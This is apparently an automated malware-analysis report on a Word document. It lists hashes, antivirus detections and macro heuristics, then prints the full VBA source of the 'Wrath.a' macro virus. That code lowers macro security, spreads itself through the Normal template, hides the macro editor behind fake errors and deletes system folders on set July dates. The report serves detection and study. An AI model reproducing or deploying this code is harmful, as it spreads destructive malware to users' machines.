Office (OLE) malware analysis — malicious · 3d3545f40afa6cf1

MALICIOUS

Office (OLE)

33.5 KB Created: 2001-07-05 15:38:00 Authoring application: Microsoft Word 8.0 First seen: 2015-10-06

MD5: 75e94b9e54d06546b3392711c52f1c50 SHA-1: 69155481bf69b0cdf85450c5d731b69b88fa6660 SHA-256: 3d3545f40afa6cf17be7837e65658d83d4a2cf345fd69ac4e17330b5c4ee3631

256 Risk Score

Heuristics 6

ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Trojan.Psycho-3
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
MyApp = Shell("notepad.exe", 1)
```
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Auto_Close macro low OLE_VBA_AUTOCLOSE

Auto_Close macro
Matched line in script
```
Sub AutoClose()
```
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2494 bytes
SHA-256: `e5dad4a69a9bcb1f8b0a88e1391a2922683aa61f07d66ae7b6b7281e9351142e`
Detection ClamAV: Doc.Trojan.Wrath-1 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Wrath" ' Wrath.a ' Coded by tROx and LoX Sub AutoOpen() On Error Resume Next System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& Set a = ActiveDocument Set b = a.VBProject Set C = b.VBComponents("Wrath") Set d = NormalTemplate Set e = d.VBProject Set f = e.VBComponents C.Export "C:\MSWIN.DLL" f.Import ("C:\MSWIN.DLL") d.Save Kill "C:\MSWIN.DLL" Call IfDate End Sub Sub Copy() On Error Resume Next Set z = NormalTemplate Set y = z.VBProject Set x = y.VBComponents("Wrath") Set w = ActiveDocument Set v = w.VBProject Set u = v.VBComponents x.Export "C:\MSWIN2.DLL" u.Import ("C:\MSWIN2.DLL") w.Save Kill "C:\MSWIN2.DLL" Call IfDate End Sub Sub AutoNew() On Error Resume Next Call Copy End Sub Sub FileSave() On Error Resume Next Call Copy End Sub Sub FileSaveAs() On Error Resume Next Dialogs(wdDialogFileSaveAs).Show Call Copy End Sub Sub AutoClose() On Error Resume Next Call Copy End Sub Sub ToolsMacro() On Error Resume Next MsgBox "Internal Error. Word is unable to activate this command.", vbCritical, "Microsoft Word" Call IfDate End Sub Sub ViewVBCode() On Error Resume Next MsgBox "Internal Error. Word is unable to activate this command.", vbCritical, "Microsoft Word" Call IfDate End Sub Sub July3() On Error Resume Next Options.BlueScreen = True MyApp = Shell("notepad.exe", 1) SendKeys " 'FEEL MY WRATH.......'", True AppActivate (MyApp) End Sub Sub July4() On Error Resume Next Options.BlueScreen = True Kill "C:/My Documents/." RmDir "C:/My Documents" Kill "C:/Program Files/Internet Explorer" Kill "C:/Windows/." Kill "C:/Windows/System" Kill "C:/Windows/System32/Drivers" MsgBox "Happy July 4th!!", vbInformation, "Microsoft Word" End Sub Sub IfDate() On Error Resume Next If Month(Now) = 7 And Day(Now) = 3 Then Call July3 End If If Month(Now) = 7 Then If Day(Now) > 3 And Day(Now) < 9 Then Call July4 End If End If End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.